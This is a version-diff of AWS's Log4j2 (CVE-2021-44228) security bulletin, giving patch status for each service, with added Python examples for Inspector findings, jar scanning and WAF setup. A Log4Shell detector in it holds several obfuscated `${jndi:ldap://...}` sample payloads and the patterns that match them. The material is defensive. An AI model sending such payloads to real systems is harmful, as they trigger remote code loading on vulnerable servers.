v3->v4
98 removals (82 lines)
Words removed | 1754
Total words | 1940
Words removed (%) | 90.41
60 additions (44 lines)
Words added | 787
Total words | 973
Words added (%) | 80.88
[V3] Last Updated Date: 2021/12/14 2:45 PM PST
[V4] Last Updated Date: 2021/12/15 3:30 PM PST
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).
Responding to security issues such as this one shows the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers’ data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.
We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one, and continue to follow our Well-Architected guidance.
One of the technologies we’ve developed and deployed is a hot patch for applications that may include Log4j. We’ve also made this available as an open-source solution, which is available here.
Even with this hot patch deployed, customers should still plan on deploying an updated Log4j library as quickly as they safely can.
Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.
Amazon API Gateway
As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
Amazon Kinesis
A new version of the Kinesis Agent, which addresses the recently disclosed Apache Log4j2 library issue (CVE-2021-44228), is available here.
Amazon CloudFront
Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
Amazon Connect
Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon DynamoDB
Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Inspector
The Amazon Inspector service is patched against the Log4j issue.
The Inspector service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads and ECR images. Detections are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, CentOS, Debian, Red Hat, SUSE and Ubuntu. Additional detections will be added as further impacts are identified by the respective distribution security teams. Inspector decomposes Java archives stored within ECR images and generates findings for impacted packages or applications. These findings will be identified in the Inspector console under “CVE-2021-44228” or “IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720 - org.apache.logging.log4j:log4j-core”.
Amazon Inspector Classic
The Amazon Inspector Classic service is patched against the Log4j issue.
The Inspector Classic service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads. Detections for CVE-2021-44228 (Log4Shell) are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, CentOS, Debian, Red Hat, SUSE and Ubuntu.
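The Inspector findings described above carry one of two identifiers, and most teams want them as a list of affected instances and images rather than console rows. The script below is an added example, not AWS code: it assumes the boto3 `inspector2` client (`list_findings` with `filterCriteria` and `nextToken` pagination) and the finding shape that service documents, queries both identifiers, de-duplicates by finding ARN, and tallies active findings by resource type. `FakeInspector`, its findings and the "fixed in" versions are constructed sample data so the script runs offline; swap in `boto3.client("inspector2")` to run it against an account.

```python
"""Pull Amazon Inspector findings for Log4Shell and tally the affected resources.

Added example, not AWS code. It assumes the boto3 'inspector2' client
(list_findings with filterCriteria and nextToken pagination) and the finding
shape that service documents; FakeInspector and its findings are constructed
sample data so the script runs offline.
"""
from collections import Counter

# Both identifiers the bulletin says Inspector attaches to this issue.
LOG4SHELL_IDS = (
    "CVE-2021-44228",
    "IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720",
)


def log4shell_filter(vulnerability_id):
    """filterCriteria for inspector2.list_findings matching one identifier."""
    return {"vulnerabilityId": [{"comparison": "EQUALS", "value": vulnerability_id}]}


def iter_findings(client, vulnerability_id):
    """Walk every page of list_findings for one identifier."""
    kwargs = {"filterCriteria": log4shell_filter(vulnerability_id), "maxResults": 100}
    while True:
        page = client.list_findings(**kwargs)
        yield from page.get("findings", [])
        token = page.get("nextToken")
        if not token:
            return
        kwargs["nextToken"] = token


def tally_log4shell(client):
    """Return (Counter of resource type -> active findings, list of package rows).

    Each package row is (resource_id, package, installed_version, fixed_in_version).
    Findings are de-duplicated by ARN in case both identifiers return the same one.
    """
    seen = set()
    by_type = Counter()
    rows = []
    for vid in LOG4SHELL_IDS:
        for finding in iter_findings(client, vid):
            arn = finding["findingArn"]
            if arn in seen or finding.get("status") != "ACTIVE":
                continue
            seen.add(arn)
            packages = finding.get("packageVulnerabilityDetails", {}).get("vulnerablePackages", [])
            for res in finding.get("resources", []):
                by_type[res["type"]] += 1
                for pkg in packages:
                    rows.append((res["id"], pkg["name"], pkg["version"], pkg.get("fixedInVersion")))
    return by_type, rows


# ---- constructed sample data standing in for the real API ----------------

def _finding(arn, status, rtype, rid, vid, pkg, version, fixed):
    return {
        "findingArn": arn,
        "status": status,
        "severity": "CRITICAL",
        "resources": [{"type": rtype, "id": rid}],
        "packageVulnerabilityDetails": {
            "vulnerabilityId": vid,
            "vulnerablePackages": [{"name": pkg, "version": version, "fixedInVersion": fixed}],
        },
    }


class FakeInspector:
    """Stand-in for boto3.client('inspector2'); serves canned, paginated pages (constructed)."""

    def __init__(self):
        base = "arn:aws:inspector2:us-east-1:123456789012:finding/"
        ec2 = _finding(base + "f-ec2", "ACTIVE", "AWS_EC2_INSTANCE", "i-0123456789abcdef0",
                       "CVE-2021-44228", "liblog4j2-java", "2.11.1-2", "2.15.0-1")
        closed = _finding(base + "f-closed", "CLOSED", "AWS_EC2_INSTANCE", "i-0fedcba9876543210",
                          "CVE-2021-44228", "apache-log4j2", "2.13.0-1", "2.15.0-1")
        ecr = _finding(base + "f-ecr", "ACTIVE", "AWS_ECR_CONTAINER_IMAGE",
                       "arn:aws:ecr:us-east-1:123456789012:repository/app/sha256:abc",
                       "IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720",
                       "org.apache.logging.log4j:log4j-core", "2.14.1", "2.16.0")
        self._pages = {
            "CVE-2021-44228": [{"findings": [ec2], "nextToken": "page-2"},
                               {"findings": [closed]}],
            # ec2 appears again under the second identifier to exercise de-duplication
            "IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720": [{"findings": [ecr, ec2]}],
        }

    def list_findings(self, filterCriteria, maxResults=100, nextToken=None):
        vid = filterCriteria["vulnerabilityId"][0]["value"]
        index = 0 if nextToken is None else int(nextToken.split("-")[1]) - 1
        return self._pages[vid][index]


if __name__ == "__main__":
    by_type, rows = tally_log4shell(FakeInspector())
    print(dict(by_type))
    for row in rows:
        print(*row)
```

The closed finding is dropped and the EC2 finding returned under both identifiers is counted once; the package rows give the installed and fixed versions you need to prioritise patching.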
Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
Amazon ElastiCache
Amazon ElastiCache’s Redis engine does not include Log4j2 in its managed runtimes or base container images. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon WorkSpaces/AppStream 2.0
Amazon WorkSpaces and AppStream 2.0 are not affected by CVE-2021-44228 with default configurations. The default Amazon Linux 2 images of WorkSpaces and AppStream do not contain Log4j, and the versions of Log4j available in the Amazon Linux 2 default package repositories are not affected by CVE-2021-44228. However, if you have deployed the WorkDocs Sync client to Windows WorkSpaces, please take the actions recommended below.
Windows WorkSpaces by default do not have WorkDocs Sync installed. However, before June 2021 WorkSpaces had a default desktop shortcut to the WorkDocs Sync client installer. WorkDocs Sync client version 1.2.895.1 (and older) contains the Log4j component. If you have deployed these older WorkDocs Sync client versions to WorkSpaces, please restart the Sync client on WorkSpaces via management tools like SCCM, or instruct your WorkSpaces users to manually open the Sync client (“Amazon WorkDocs” in the list of installed programs). At launch, the Sync client will auto-update to the latest version, 1.2.905.1, which is not affected by CVE-2021-44228. The WorkDocs Drive and WorkDocs Companion applications are not affected by the issue.
Amazon DocumentDB
As of December 13, 2021, Amazon DocumentDB has been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
Amazon EMR
CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, Apache Hudi, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Amazon Timestream
Amazon Timestream has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon CloudWatch
Amazon CloudWatch services have been updated to mitigate the issues identified in CVE-2021-44228.
AWS IoT SiteWise Edge
Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.
Amazon Keyspaces (for Apache Cassandra)
Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Secrets Manager
AWS Secrets Manager has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Single Sign-On
Amazon Single Sign-On services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Kinesis Data Analytics
The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.
Amazon Kinesis Data Streams
We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.X and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version and we strongly recommend that all KCL version 1.x customers upgrade to KCL version 1.14.5 (or higher) which is available here.
Amazon RDS Oracle
Amazon RDS Oracle has updated the version of Log4j2 in use within the service. Access to RDS instances continues to be restricted by your VPCs and other security controls such as security groups and network access control lists (ACL). We strongly encourage you to review these settings to ensure proper access management to your RDS instances.
Per Oracle Support document 2827611.1, the Oracle database itself is not affected by this issue.
Amazon Cloud Directory
Amazon Cloud Directory has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Managed Streaming for Apache Kafka (MSK)
We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache ZooKeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use the Log4j 2.x library and are being patched where needed.
AWS KMS
AWS KMS has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Simple Queue Service (SQS)
Amazon Simple Queue Service (SQS) completed patching for the Apache Log4j2 issue (CVE-2021-44228) for SQS’s data ingress and egress on December 13, 2021. We have also completed patching all other SQS systems that used Log4j2.
Amazon Managed Workflows for Apache Airflow (MWAA)
MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).
As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.
We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.
Amazon MemoryDB for Redis
Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon Redshift
Amazon Redshift clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
AWS Directory Service
AWS Directory Service has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.
Amazon Neptune
All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
Amazon OpenSearch Service
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
Amazon RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during the update of internal components.
Amazon S3
Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
Amazon Simple Notification Service (SNS)
Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.
Amazon Simple Workflow Service (SWF)
Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.
AWS CloudHSM
AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.
AWS Greengrass
Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
AWS Lake Formation
AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AWS Lambda [V3]
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
AWS Lambda [V4]
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issues described in CVE-2021-44228 and CVE-2021-45046.
For cases where a customer function includes an impacted Log4j2 version, we have applied a change to the Lambda Java managed runtimes and base container images (Java 8, Java 8 on AL2, and Java 11) that helps to mitigate the issues in CVE-2021-44228 and CVE-2021-45046. Customers using managed runtimes will have the change applied automatically. Customers using container images will need to rebuild from the latest base container image, and redeploy.
Independent of this change, we strongly encourage all customers whose functions include Log4j2 to update to the latest version. Specifically, customers using the aws-lambda-java-log4j2 library in their functions should update to version 1.4.0 and redeploy their functions. This version updates the underlying Log4j2 utility dependencies to version 2.16.0. The updated aws-lambda-java-log4j2 binary is available at the Maven repository and its source code is available in GitHub.
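The Lambda guidance above, and the AWS Glue note earlier about custom jars uploaded for ETL jobs, both leave the customer to find out which of their own artifacts actually bundle Log4j2. The scanner below is an added example, not AWS code: it opens a deployment zip or jar with the standard library, reads the log4j-core version from `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties`, checks whether `JndiLookup.class` is still present, and recurses into nested jars (fat jars and Lambda zips that carry a `lib/` directory). The version boundaries it uses come from this bulletin: 2.0 through 2.14.1 for CVE-2021-44228, and 2.16.0 as the version aws-lambda-java-log4j2 1.4.0 pulls in. The sample archive it builds is constructed; the fake class bytes inside it are not real Log4j code.

```python
"""Scan a Java deployment artifact (Lambda zip, Glue job jar, fat jar) for Log4j 2 core.

Added example, not AWS code. Reports the log4j-core version recorded in the
Maven pom.properties, whether JndiLookup.class is present, and a verdict using
the version ranges this bulletin names. Recurses into nested jars and zips.
"""
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".zip", ".war", ".ear")


def _version_tuple(version):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '-beta9' contribute their digits."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def is_vulnerable_version(version):
    """True for 2.0 <= version <= 2.14.1, the range the bulletin gives for CVE-2021-44228."""
    return (2, 0) <= _version_tuple(version) <= (2, 14, 1)


def below_recommended(version):
    """True below 2.16.0, the version aws-lambda-java-log4j2 1.4.0 moves to."""
    return _version_tuple(version) < (2, 16)


def scan_archive(data, path="<root>", findings=None):
    """Recursively inspect archive bytes; returns [(path, version_or_None, jndi_present)]."""
    if findings is None:
        findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = sorted(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi = JNDI_LOOKUP in names
        if version is not None or jndi:
            findings.append((path, version, jndi))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    scan_archive(zf.read(name), f"{path}/{name}", findings)
                except zipfile.BadZipFile:
                    pass  # named like an archive but is not one; skip it
    return findings


def assess(findings):
    """Turn scanner rows into verdicts: vulnerable, mitigated, update or ok."""
    verdicts = []
    for path, version, jndi in findings:
        if version is None:
            verdict = "vulnerable"  # JndiLookup present, version unknown: treat as affected
        elif is_vulnerable_version(version):
            verdict = "vulnerable" if jndi else "mitigated"  # class removed by a hot fix
        elif below_recommended(version):
            verdict = "update"  # e.g. 2.15.0: past CVE-2021-44228 but not yet at 2.16.0
        else:
            verdict = "ok"
        verdicts.append((path, version, verdict))
    return verdicts


def build_sample_lambda_zip():
    """Constructed sample: a Lambda zip with a fat jar (log4j-core 2.14.1) and a 2.16.0 jar."""
    def jar(version):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as j:
            j.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                                  "artifactId=log4j-core\n")
            j.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # fake class bytes, constructed
        return buf.getvalue()

    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("handler.py", "# placeholder handler, constructed\n")
        z.writestr("lib/app-all.jar", jar("2.14.1"))
        z.writestr("lib/log4j-core-2.16.0.jar", jar("2.16.0"))
    return outer.getvalue()


if __name__ == "__main__":
    for path, version, verdict in assess(scan_archive(build_sample_lambda_zip())):
        print(f"{verdict:10} {version or '?':8} {path}")
```

Run it against a real artifact with `assess(scan_archive(open("function.zip", "rb").read()))`. A "mitigated" verdict means an affected version whose `JndiLookup` class has been stripped, which is the class-removal workaround; it is still worth replacing with 2.16.0 or later as the bulletin recommends.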
AWS Step Functions
AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Web Application Firewall (WAF)
To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.
AWSManagedRulesKnownBadInputsRuleSet inspects the request URI, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rule groups to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.
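The request parts the rule group inspects are also where a team's own detection (in access-log review or a custom WAF rule) has to look, and the hard part is the obfuscation Log4j lookups allow. The script below is an added example; it is not AWS code and not the logic of AWSManagedRulesKnownBadInputsRuleSet. It percent-decodes the value (twice, for double encoding), collapses the common hiding forms `${lower:x}`, `${upper:x}`, `${env:NAME:-x}` and `${::-x}` to the literal they evaluate to, and then looks for `${jndi:`. The sample requests are constructed, `example.invalid` is a reserved name, and the detector scans every header rather than the subset the managed rule group uses.

```python
"""Detect Log4Shell lookup strings in the request URI, headers and body.

Added example, not AWS code and not the AWSManagedRulesKnownBadInputsRuleSet logic.
Shows the normalisation a detector needs before matching '${jndi:'.
"""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} resolve to x; ${anything:-x} (including ${::-x}) resolves
# to the default x when the lookup fails. Only innermost forms match ([^${}]), so
# repeated passes peel one layer each time.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}",
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(value):
    """Percent-decode (twice) and collapse lookup tricks until the string is stable."""
    s = unquote(unquote(value))
    for _ in range(10):  # bounded; real payloads nest a handful of layers at most
        new = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
        if new == s:
            break
        s = new
    return s.lower()


def looks_like_log4shell(value):
    return bool(_JNDI.search(normalize(value)))


def scan_request(uri, headers, body):
    """Return the request parts carrying a lookup: 'uri', 'header:<name>' and/or 'body'."""
    hits = []
    if looks_like_log4shell(uri):
        hits.append("uri")
    for name, value in headers.items():
        if looks_like_log4shell(value):
            hits.append(f"header:{name.lower()}")
    if looks_like_log4shell(body):
        hits.append("body")
    return hits


# Constructed sample requests: one clean, then the URI, User-Agent, body and a
# custom header each carrying a differently obfuscated lookup.
SAMPLE_REQUESTS = [
    {"uri": "/index.html", "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
    {"uri": "/api/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D",
     "headers": {"User-Agent": "curl/7.79"}, "body": ""},
    {"uri": "/", "headers": {"User-Agent": "${${lower:j}ndi:ldap://example.invalid/a}"}, "body": ""},
    {"uri": "/", "headers": {"User-Agent": "Mozilla/5.0"},
     "body": '{"name": "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/x}"}'},
    {"uri": "/", "headers": {"X-Api-Version":
     "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//example.invalid/x}"},
     "body": ""},
]


def scan_all(requests):
    return [scan_request(**r) for r in requests]


if __name__ == "__main__":
    for req, hits in zip(SAMPLE_REQUESTS, scan_all(SAMPLE_REQUESTS)):
        print(hits or "clean", req["uri"])
```

The percent-encoded URI, the `${lower:j}` User-Agent, the `${::-x}` body and the `${env:...:-x}` header all reduce to the same `${jndi:...}` string after normalisation; a detector that matches only the literal `${jndi:` misses three of the four.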
We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version. For customers using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions. Customers can use AWS Firewall Manager which enables you to configure AWS WAF rules across multiple AWS accounts and resources from a single place. You can group rules, build policies, and centrally apply those policies across your entire infrastructure.
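Putting the two paragraphs above into a concrete web ACL: the script below is an added example, not AWS code. It assumes the boto3 `wafv2` client (`create_web_acl`, `associate_web_acl`) and the WAFv2 request shape, references both managed rule groups without a `Version` key so the default version is used and rule-group updates arrive automatically, chooses the `CLOUDFRONT` scope for a distribution ARN and `REGIONAL` for ALB, API Gateway stage and AppSync API ARNs, and associates the ACL for the regional cases. The ARNs and account ID are constructed placeholders and `FakeWafv2` is a stand-in client so the script runs offline.

```python
"""Create the AWS WAF web ACL the bulletin describes and attach it to a resource.

Added example, not AWS code. Assumes the boto3 'wafv2' client API; ARNs are
constructed placeholders and FakeWafv2 stands in for the real client.
"""

# The two AWS Managed Rules groups recommended in the bulletin. No 'Version' is set
# on the ManagedRuleGroupStatement, which selects the default (auto-updating) version.
MANAGED_RULE_GROUPS = (
    "AWSManagedRulesKnownBadInputsRuleSet",
    "AWSManagedRulesAnonymousIpList",
)

# Constructed placeholder ARNs for the two scopes.
ALB_ARN = "arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/web/0123456789abcdef"
CLOUDFRONT_ARN = "arn:aws:cloudfront::123456789012:distribution/EDFDVBD6EXAMPLE"


def _visibility(metric_name):
    return {"SampledRequestsEnabled": True, "CloudWatchMetricsEnabled": True,
            "MetricName": metric_name}


def managed_rule(name, priority):
    """Reference one managed rule group; OverrideAction None keeps the group's own block/count actions."""
    return {
        "Name": name,
        "Priority": priority,
        "Statement": {"ManagedRuleGroupStatement": {"VendorName": "AWS", "Name": name}},
        "OverrideAction": {"None": {}},
        "VisibilityConfig": _visibility(name),
    }


def scope_for(resource_arn):
    """CloudFront distributions use Scope CLOUDFRONT (client in us-east-1); ALB, API Gateway
    stages and AppSync GraphQL APIs use REGIONAL."""
    return "CLOUDFRONT" if ":cloudfront:" in resource_arn else "REGIONAL"


def web_acl_request(name, resource_arn):
    """Parameters for wafv2.create_web_acl: allow by default, evaluate both managed groups."""
    return {
        "Name": name,
        "Scope": scope_for(resource_arn),
        "DefaultAction": {"Allow": {}},
        "Rules": [managed_rule(group, priority) for priority, group in enumerate(MANAGED_RULE_GROUPS)],
        "VisibilityConfig": _visibility(name),
    }


def apply_web_acl(client, name, resource_arn):
    """Create the ACL and, for regional resources, associate it. Returns the web ACL ARN.

    CloudFront distributions are not attached with associate_web_acl: set the returned
    ARN as WebACLId in the distribution config (cloudfront.update_distribution) instead.
    """
    response = client.create_web_acl(**web_acl_request(name, resource_arn))
    acl_arn = response["Summary"]["ARN"]
    if scope_for(resource_arn) == "REGIONAL":
        client.associate_web_acl(WebACLArn=acl_arn, ResourceArn=resource_arn)
    return acl_arn


class FakeWafv2:
    """Constructed stand-in for boto3.client('wafv2') that records the calls made."""

    def __init__(self):
        self.calls = []

    def create_web_acl(self, **params):
        self.calls.append(("create_web_acl", params))
        scope = params["Scope"].lower()
        return {"Summary": {"ARN": f"arn:aws:wafv2:us-east-1:123456789012:{scope}/webacl/{params['Name']}/0000"}}

    def associate_web_acl(self, **params):
        self.calls.append(("associate_web_acl", params))
        return {}


if __name__ == "__main__":
    client = FakeWafv2()  # replace with boto3.client("wafv2", region_name=...)
    print(apply_web_acl(client, "log4j-managed-rules", ALB_ARN))
    for call, params in client.calls:
        print(call, sorted(params))
```

`OverrideAction: {"None": {}}` is the setting to get right: `{"Count": {}}` would turn both rule groups into count-only mode and block nothing. For AWS WAF Classic there is no equivalent of the managed rule group reference, which is why the bulletin points Classic users at migration or custom regex match conditions.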
NICE
Because the Apache Log4j library affected by CVE-2021-44228 is included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.